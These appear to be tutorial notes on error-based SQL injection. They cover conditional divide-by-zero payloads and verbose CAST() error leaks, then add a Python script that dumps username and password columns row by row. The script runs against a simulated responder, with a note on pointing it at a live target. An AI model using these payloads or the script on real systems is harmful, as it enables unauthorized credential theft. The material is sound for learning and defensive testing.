Error-based SQL injection: cases where you can use error messages to either extract or infer sensitive data from the database, even in blind contexts.
Types of errors:
1. Conditional errors: make the query return a specific error response depending on a boolean expression. Same idea as conditional responses, except the signal is an error (typically a different status code or error page) rather than a difference in page content.
Suppose two requests are sent containing the following TrackingId cookie values in turn:
xyz' AND (SELECT CASE WHEN (1=2) THEN 1/0 ELSE 'a' END)='a
xyz' AND (SELECT CASE WHEN (1=1) THEN 1/0 ELSE 'a' END)='a
The CASE keyword tests a condition and returns one expression if it is true and another otherwise. In the first request the condition is false (1≠2), so the CASE evaluates to 'a' and the query runs normally. In the second request 1=1 is true, so the CASE evaluates to 1/0, which causes a divide-by-zero error.
Because the error changes the response, we can determine whether the injected condition is true. Replacing 1=1 with a condition about the data (e.g. a comparison on one character of a column value) lets us extract it one bit at a time.
Caveat: dividing by zero only raises an error on some databases (PostgreSQL, Oracle and SQL Server do). MySQL returns NULL for 1/0 in a SELECT by default, so a different error trigger is needed there.
2. Verbose error messages: trigger error messages that output the data returned by the query.
The database or application can be misconfigured so that the raw error message is shown to the user. If that message quotes the offending value, a blind injection becomes a visible one: the data comes back inside the error itself.
The CAST() function converts one data type to another. For example, imagine a query containing the following statement:
CAST((SELECT example_column FROM example_table) AS int)
The data we want to read is usually a string; forcing it into an incompatible data type such as int makes the cast fail, and the error message quotes the value it could not convert:
ERROR: invalid input syntax for type integer: "Example data"
Notes: that error text is PostgreSQL's; other databases word the same failure differently. The subquery must return a single row (use LIMIT 1, and OFFSET to walk through the rows), otherwise PostgreSQL raises "more than one row returned by a subquery used as an expression" instead of leaking a value.
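Added example, not part of the original notes: a Python script that turns the CAST() trick into a row-by-row dump. It injects CAST((SELECT column FROM table LIMIT 1 OFFSET n) AS int) for n = 0, 1, 2, ..., parses the quoted value out of the PostgreSQL error, and stops at the first request that no longer errors (the subquery returned no row, and CAST(NULL AS int) succeeds). The table and column names are assumptions, and the HTTP round trip is replaced by a simulated PostgreSQL-backed responder built on constructed sample rows so the script runs offline.

```python
import re

# Constructed sample table standing in for the target's data; values are made up.
TABLE = {
    "username": ["administrator", "wiener", "carlos"],
    "password": ["x7Kq!m2p", "blue-sky-9", "montoya"],
}

# Shape of the verbose PostgreSQL error when a string is cast to int. A value
# containing a double quote would be cut short by this pattern.
PG_CAST_ERROR = re.compile(r'invalid input syntax for type integer: "([^"]*)"')


def cast_error_payload(row: int, column: str = "password", table: str = "users") -> str:
    """TrackingId cookie value that forces row `row` of `column` through
    CAST(... AS int). LIMIT 1 keeps the subquery scalar, OFFSET selects the row,
    and -- comments out the rest of the original query. Table and column names
    are assumptions for the example."""
    return (f"xyz' AND 1=CAST((SELECT {column} FROM {table} "
            f"LIMIT 1 OFFSET {row}) AS int)--")


def simulated_response(cookie: str) -> str:
    """Stand-in for the HTTP round trip against a PostgreSQL-backed app that
    prints raw database errors. Returns the page body the payload would get."""
    m = re.search(r"SELECT (\w+) FROM users LIMIT 1 OFFSET (\d+)\) AS int", cookie)
    if m is None:
        return "<html><p>Welcome back!</p></html>"       # nothing injected
    column, row = m.group(1), int(m.group(2))
    values = TABLE.get(column, [])
    if row >= len(values):
        # No row returned: the scalar subquery is NULL and CAST(NULL AS int)
        # succeeds, so the page renders normally.
        return "<html><p>Welcome back!</p></html>"
    return (f'<p class="is-warning">ERROR: invalid input syntax for type integer: '
            f'"{values[row]}"</p>')


def leaked_value(body: str):
    """Pull the quoted value out of a verbose cast error, or None if absent."""
    m = PG_CAST_ERROR.search(body)
    return m.group(1) if m else None


def dump_column(send, column: str = "password", table: str = "users", max_rows: int = 100):
    """Read a whole column one row per request, stopping at the first request
    that no longer produces the cast error (i.e. past the last row)."""
    values = []
    for row in range(max_rows):
        value = leaked_value(send(cast_error_payload(row, column, table)))
        if value is None:
            break
        values.append(value)
    return values


if __name__ == "__main__":
    for user, pw in zip(dump_column(simulated_response, "username"),
                        dump_column(simulated_response, "password")):
        print(f"{user}: {pw}")
```

Against a live target, replace `simulated_response` with a function that sends the cookie and returns the response body; if the body contains "more than one row returned by a subquery used as an expression", the LIMIT 1 was lost (for example to a length limit on the cookie) and the payload needs shortening.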